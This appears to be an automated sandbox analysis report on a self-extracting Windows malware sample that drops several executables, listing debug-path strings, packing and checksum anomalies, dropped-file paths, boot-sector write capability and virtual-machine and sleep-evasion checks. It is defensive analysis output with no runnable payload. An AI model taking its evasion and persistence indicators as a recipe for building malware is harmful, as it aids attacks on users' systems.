Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000004.00000003.245677831.0000000005580000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270108599.0000000004BF0000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdbF source: WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: D:\workspace\workspace_c\GiehH4yhJgg54_17\Release\GiehH4yhJgg54_17.pdb source: hjjgaa.exe
Source: Binary string: oleacc.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000004.00000003.245673054.0000000005451000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.270093131.0000000004A11000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000004.00000003.245673054.0000000005451000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.270093131.0000000004A11000.00000004.00000001.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000004.00000003.245677831.0000000005580000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270108599.0000000004BF0000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: oleacc.pdbE source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp
Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: ntmarta.pdbL source: WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000004.00000003.245673054.0000000005451000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.270093131.0000000004A11000.00000004.00000001.sdmp
Source: Binary string: dwmapi.pdb[ source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdb( source: WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000004.00000003.245673054.0000000005451000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.270093131.0000000004A11000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000004.00000003.245673054.0000000005451000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.270093131.0000000004A11000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdbI source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdb< source: WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdbJ source: WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: oledlg.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: setup.exe, 00000011.00000000.294134315.0000000000082000.00000002.00020000.sdmp, setup.exe.15.dr
Source: Binary string: profapi.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: oledlg.pdbO source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp
Source: Binary string: winspool.pdb source: WerFault.exe, 00000004.00000003.245677831.0000000005580000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270108599.0000000004BF0000.00000004.00000040.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000004.00000003.245673054.0000000005451000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.270093131.0000000004A11000.00000004.00000001.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000004.00000003.245677831.0000000005580000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270108599.0000000004BF0000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: 3.pdb] source: hjjgaa.exe
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip32\Release\sfxzip.pdb source: KeJ7Cl7flZ.exe
Source: Binary string: propsys.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: D:\workspace\workspace_c\GiehH4yhJgg54_17\Release\GiehH4yhJgg54_17.pdb- source: hjjgaa.exe
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: oleacc.pdb2 source: WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: msctf.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000004.00000003.245677831.0000000005580000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270108599.0000000004BF0000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000004.00000003.245677831.0000000005580000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270108599.0000000004BF0000.00000004.00000040.sdmp
Source: Binary string: sechost.pdbk source: WerFault.exe, 00000004.00000003.245677831.0000000005580000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270108599.0000000004BF0000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000004.00000003.245677831.0000000005580000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270108599.0000000004BF0000.00000004.00000040.sdmp
Source: Binary string: D:\Projects\crxinstall\trunk\Release\spoofpref.pdb5 source: askinstall21.exe
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000004.00000003.245677831.0000000005580000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270108599.0000000004BF0000.00000004.00000040.sdmp
Source: Binary string: winspool.pdbk source: WerFault.exe, 00000004.00000003.245677831.0000000005580000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270108599.0000000004BF0000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb. source: WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: C:\Users\Operations\Source\Workspaces\Sib\Sibl\Release\Sibuia.pdb} source: Setup.exe, 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp
Source: Binary string: D:\Projects\crxinstall\trunk\Release\spoofpref.pdb source: askinstall21.exe
Source: Binary string: powrprof.pdbW source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000004.00000003.245673054.0000000005451000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.270093131.0000000004A11000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000004.00000003.245673054.0000000005451000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.270093131.0000000004A11000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Operations\Source\Workspaces\Sib\Sibl\Release\Sibuia.pdb source: Setup.exe, 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp
Source: Binary string: crypt32.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: KeJ7Cl7flZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: KeJ7Cl7flZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: KeJ7Cl7flZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: KeJ7Cl7flZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: KeJ7Cl7flZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)Show sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeUnpacked PE file: 26.2.jg2_2qua.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Detected unpacking (creates a PE file in dynamic memory)Show sources
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeUnpacked PE file: 19.2.aliens.exe.3310000.5.unpack
Binary contains a suspicious time stampShow sources
Source: initial sampleStatic PE information: 0xBD323864 [Sat Aug 2 06:04:20 2070 UTC]
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_01262070 IsBadReadPtr,LoadLibraryA,GetProcAddress,IsBadReadPtr,Sleep,
Source: initial sampleStatic PE information: section where entry point is pointing to: .MPRESS2
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_4900203Jump to behavior
Source: KeJ7Cl7flZ.exeStatic PE information: real checksum: 0x0 should be: 0x795ef5
Source: 85F91A36E275562F.exe.19.drStatic PE information: real checksum: 0xcf3f0 should be:
Source: aliens.exe.17.drStatic PE information: real checksum: 0xcf3f0 should be:
Source: 002.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1479d3
Source: jg2_2qua.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x90533
Source: jg2_2qua.exe.26.drStatic PE information: real checksum: 0x0 should be: 0x90533
Source: Setup.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x40e92a
Source: KeJ7Cl7flZ.exeStatic PE information: section name: .didat
Source: jg2_2qua.exe.0.drStatic PE information: section name: .MPRESS1
Source: jg2_2qua.exe.0.drStatic PE information: section name: .MPRESS2
Source: jg2_2qua.exe.26.drStatic PE information: section name: .MPRESS1
Source: jg2_2qua.exe.26.drStatic PE information: section name: .MPRESS2
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ED4066 push ecx; ret
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ED3344 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_01285B48 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_01283AF5 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_1008CAD5 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_10082CFE push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FEDF9A8 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0006E0E4 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0006EBA6 push ecx; ret
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_10010579 push ecx; ret
Source: initial sampleStatic PE information: section name: .MPRESS1 entropy: 7.99955674607
Source: initial sampleStatic PE information: section name: .MPRESS1 entropy: 7.99955674607

Persistence and Installation Behavior:

barindex
Contains functionality to infect the boot sectorShow sources
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d
Drops PE files to the document folder of the userShow sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeFile created: C:\Users\user\Documents\VlcpVideoV1.0.1\jg2_2qua.exeJump to dropped file
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeJump to dropped file
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeFile created: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeJump to dropped file
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeFile created: C:\ProgramData\sib\{F9266136-0000-46F8-BC66-FDD9185E4296}\SibClr.dllJump to dropped file
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\hjjgaa.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeFile created: C:\Users\user\Documents\VlcpVideoV1.0.1\jg2_2qua.exeJump to dropped file
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\SSSS.exeJump to dropped file
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\BTRSetp.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsq2FFD.tmp\Sibuia.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeFile created: C:\Users\user\AppData\Local\Temp\sib309A.tmp\SibClr.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeFile created: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeJump to dropped file
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\askinstall21.exeJump to dropped file
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\file1.exeJump to dropped file
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\ubisoftpro.exeJump to dropped file
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeFile created: C:\Users\user\AppData\Local\Temp\85F91A36E275562F.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeFile created: C:\ProgramData\sib\{F9266136-0000-46F8-BC66-FDD9185E4296}\SibClr.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Setup.exe.logJump to behavior

Boot Survival:

barindex
Contains functionality to infect the boot sectorShow sources
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_01261890 IsIconic,_memset,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_0128615A RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\SysWOW64\WerFault.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363} DeviceTicketJump to behavior
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains functionality to detect sleep reduction / modificationsShow sources
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00444078
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_100202D0
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeDropped PE file which has not been started: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeJump to dropped file
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\hjjgaa.exeJump to dropped file
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\SSSS.exeJump to dropped file
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\BTRSetp.exeJump to dropped file
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\askinstall21.exeJump to dropped file
